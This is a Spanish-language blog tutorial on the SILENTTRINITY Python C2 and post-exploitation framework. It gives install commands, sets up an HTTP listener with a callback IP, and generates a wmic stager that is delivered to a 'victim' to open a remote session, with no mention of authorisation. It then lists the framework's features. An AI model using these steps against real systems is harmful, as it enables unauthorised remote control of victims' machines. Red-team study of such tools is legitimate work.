SILENTTRINITY

August 23rd, 2019 Posted by Blog, Solo Miembros 0 thoughts on “SILENTTRINITY”

Existen muchas herramientas pero las escritas en python son las que enamoran en especial SILENTTRINITY con la cual puedes hacer varias cosas que aprenderás en esta publicación; no se requiere tener conocimientos previos solo tienes que usarla y aprenderás.

La instalación es algo muy sencillo, a diferencia de Windows, en Linux la instalacion de cualquier aplicación es muy sencilla; basta con solo escribir algunos comandos en consola y todo quedará listo. A continuación tenemos una lista de comando que escribiremos en consola con los cuales instalaremos e iniciaremos SILENTTRINITY.

apt install python3.7 python3.7-dev python3-pip
git clone https://github.com/byt3bl33d3r/SILENTTRINITY
cd SILENTTRINITY/Server
python3.7 -m pip install -r requirements.txt
python3.7 st.py

 

La sintaxis de la línea de comando de esta herramienta es muy similar a la de Metasploit o Empire, por lo que también es muy intuitiva; por ejemplo, veamos que pasa si escribimos el comando help en la consola.

Podemos configurar fácilmente un escucha HTTP con los siguientes comandos:

listeners
use http
set BindIP callback_ip_here
set Port callback_port_here
start

Con nuestro oyente en ejecución, pasamos a elegir el wmic stager y lo generamos para el oyente activo “http”:

stagers
use wmic
generate http

Se generó un archivo wmic.xsl con carga útil en el directorio del Servidor, y lo entregaremos a través de HTTP a la víctima:

Después de la entrega y ejecución del stager, podemos ver que se abrió una nueva sesión en nuestro servidor:

En este punto podemos jugar con varios módulos:

En resumen podemos decir que SILENTTRINITY es un marco C2 / post-explotación moderno, asíncrono, multijugador y multiservidor impulsado por Python 3 y .NETs DLR.

Algunas de las características principales que distinguen a SILENTTRINITY son:

  • Multiusuario y multiservidor: admite la colaboración multiusuario. Además, el cliente puede conectarse y controlar múltiples Teamservers.
  • Cliente y Teamserver integrados en Python 3.7 : se utilizan las últimas y mejores características del lenguaje Python; el uso intensivo de Asyncio proporciona velocidades ridículas.
  • Actualizaciones y comunicación en tiempo real : el uso de Websockets permite la comunicación y las actualizaciones en tiempo real entre el Cliente y Teamserver.
  • Comunicación C2 encriptada ECDHE : SILENTTRINITY utiliza el intercambio de claves Diffie-Hellman de curva elíptica efímera para encriptar todo el tráfico C2 entre el Teamserver y su implante.
  • Completamente modular : los oyentes, módulos, etapas y canales C2 son completamente modulares, lo que permite a los operadores construir fácilmente los suyos.
  • Registro extenso : cada acción se registra en un archivo.

Te invito a seguir revisando las publicaciones de nuestro sitio web te aseguro que encontrarás muchos temas interesantes que pueden ampliar tu conocimiento.

Referencias:

https://github.com/byt3bl33d3r/SILENTTRINITY 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.